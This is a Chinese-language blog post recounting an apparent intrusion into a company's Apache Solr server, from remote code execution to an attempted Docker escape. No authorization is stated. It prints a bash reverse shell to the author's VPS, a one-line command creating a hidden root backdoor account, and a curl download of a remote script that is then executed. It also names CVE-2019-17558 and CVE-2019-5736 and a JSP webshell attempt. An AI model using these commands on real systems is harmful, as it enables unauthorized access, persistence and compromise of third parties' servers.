从RCE到尝试docker逃逸的曲折之路

	0x01 前言 日常日站，在测试某企业的时候扫描器突然发生反应，发现个solr，一个偶然机会开始写这篇文章。 0x02 前戏 看了看solr的版本 正好之前研究过一段时间的solr的一些rce，挨个试试 在一顿操作后，啪的一下很快哈，找到一个CVE-2019-17558可以利用 0x03 命令执行 尝试使用CVE-2019-17558脚本执行命令 运气爆棚直接就是root权限，我自己都不明白为啥是root 兴奋之极赶紧反弹shell呀 bash -i >& /dev/tcp/xx.xx.169.148/1234 0>&1 复制代码 报错500,当时我就懵逼了 看了看自己的vps，发现啥反应都没有,估计是poc不支持，换了好几个都没用，咋办呀 很快哈，看一下ssh开了没，开了的话直接创个用户直接连上去不就行了 开了，开搞，一句话创建用户设置密码并给root权限 useradd -p 0`openssl passwd -1 -salt 'abc' cqrdpass` -u 0  -o -g root -G root -s /bin/bash -d /usr/bin/cqrd cqrd 复制代码 看一下/etc/passwd 但是.... 连接的时候我直接去世 去查了一下发现是设置过ssh配置文件，这可咋整 我决定在试试反弹shell 0x04 再次尝试 这次换一种方法，直接在vps上的web下载到本地 curl xx.xx.169.148/123.sh -o 123.sh 复制代码 爆了500 看一下目录 ohhhh,上传上去了 然后就是 给权限 执行 bash ./123.sh 当我执行第二个命令的时候我又去世了 居然是docker，试试CVE-2019-5736 发现可以但是...然后呢? 仔细一看发现需要别人启动才会触发 这一等就是一天，发现什么鬼都没弹，还时不时的被别的ip访问而断开 于是我决定，不搞了收工。 结语 感觉这一次实战学习到了很多，期间还试过jsp码子上到webapp上面连接,但是发现不行 还是有很多的问题没有解决，我还是需要多多学习，告辞!